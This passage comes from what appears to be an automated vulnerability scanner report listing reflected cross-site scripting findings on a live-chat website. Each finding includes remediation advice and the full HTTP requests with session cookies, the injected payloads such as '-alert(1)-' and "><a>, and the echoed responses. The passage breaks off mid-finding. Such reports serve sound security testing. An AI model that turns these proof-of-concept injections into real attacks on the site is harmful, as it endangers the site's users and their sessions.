GET /live-sex-chats/gay/?d4cfa'-alert(1)-'0c9972c192e=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:21:28 GMT Connection: close Content-Length: 195962 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/gay/?d4cfa'-alert(1)-'0c9972c192e=1&qs=cat=1^roomid=53^d4cfa'-alert(1)-'0c9972c192e=1&qs=cat=1^roomid=53^d4cfa'-alert(1)-'0c9972c192e=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eb ...[SNIP]...
2.91. http://imlive.com/live-sex-chats/guy-alone/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://imlive.com
Path:
/live-sex-chats/guy-alone/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5b427'-alert(1)-'a0cb4a3aa6b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/guy-alone/?5b427'-alert(1)-'a0cb4a3aa6b=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:19:39 GMT Connection: close Content-Length: 70611 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/guy-alone/?5b427'-alert(1)-'a0cb4a3aa6b=1&qs=cat=1^roomid=54^5b427'-alert(1)-'a0cb4a3aa6b=1&qs=cat=1^roomid=54^5b427'-alert(1)-'a0cb4a3aa6b=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eb ...[SNIP]...
2.92. http://imlive.com/live-sex-chats/guy-alone/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/live-sex-chats/guy-alone/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88b77"><a>0945077855 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /live-sex-chats/guy-alone/?88b77"><a>0945077855=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:19:25 GMT Connection: close Content-Length: 70405 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a href="/live-sex-chats/guy-alone/?88b77"><a>0945077855=1"> ...[SNIP]...
2.93. http://imlive.com/live-sex-chats/happyhour/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://imlive.com
Path:
/live-sex-chats/happyhour/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 95f8e'-alert(1)-'12b8116e5e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/happyhour/?95f8e'-alert(1)-'12b8116e5e2=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:38 GMT Connection: close Content-Length: 22962 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/happyhour.aspx&he=imlive.com&ul=/live-sex-chats/happyhour/?95f8e'-alert(1)-'12b8116e5e2=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ...[SNIP]...
2.94. http://imlive.com/live-sex-chats/happyhour/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/live-sex-chats/happyhour/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82f3c"><a>aec254de933 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /live-sex-chats/happyhour/?82f3c"><a>aec254de933=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:15 GMT Connection: close Content-Length: 22814 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/happyhour/?82f3c"><a>aec254de933=1');return false;" lang="en-US" hreflang="en-US"> ...[SNIP]...
2.95. http://imlive.com/live-sex-chats/lesbian-couple/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://imlive.com
Path:
/live-sex-chats/lesbian-couple/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c06bb'-alert(1)-'229e135fe5b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/lesbian-couple/?c06bb'-alert(1)-'229e135fe5b=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:21:07 GMT Connection: close Content-Length: 119630 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/lesbian-couple/?c06bb'-alert(1)-'229e135fe5b=1&qs=cat=1^roomid=191^c06bb'-alert(1)-'229e135fe5b=1&qs=cat=1^roomid=191^c06bb'-alert(1)-'229e135fe5b=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63 ...[SNIP]...
2.96. http://imlive.com/live-sex-chats/lesbian-couple/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/live-sex-chats/lesbian-couple/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95de2"><a>dfcf1a79259 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /live-sex-chats/lesbian-couple/?95de2"><a>dfcf1a79259=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:20:50 GMT Connection: close Content-Length: 119446 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a href="/live-sex-chats/lesbian-couple/?95de2"><a>dfcf1a79259=1"> ...[SNIP]...
2.97. http://imlive.com/live-sex-chats/lesbian/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://imlive.com
Path:
/live-sex-chats/lesbian/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 799a4'-alert(1)-'5a8a05031a3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/lesbian/?799a4'-alert(1)-'5a8a05031a3=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:19:42 GMT Connection: close Content-Length: 33699 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/lesbian/?799a4'-alert(1)-'5a8a05031a3=1&qs=cat=1^roomid=11^799a4'-alert(1)-'5a8a05031a3=1&qs=cat=1^roomid=11^799a4'-alert(1)-'5a8a05031a3=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eb ...[SNIP]...
2.98. http://imlive.com/live-sex-chats/lesbian/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/live-sex-chats/lesbian/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af6d9"><a>bfa76ccfa1f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
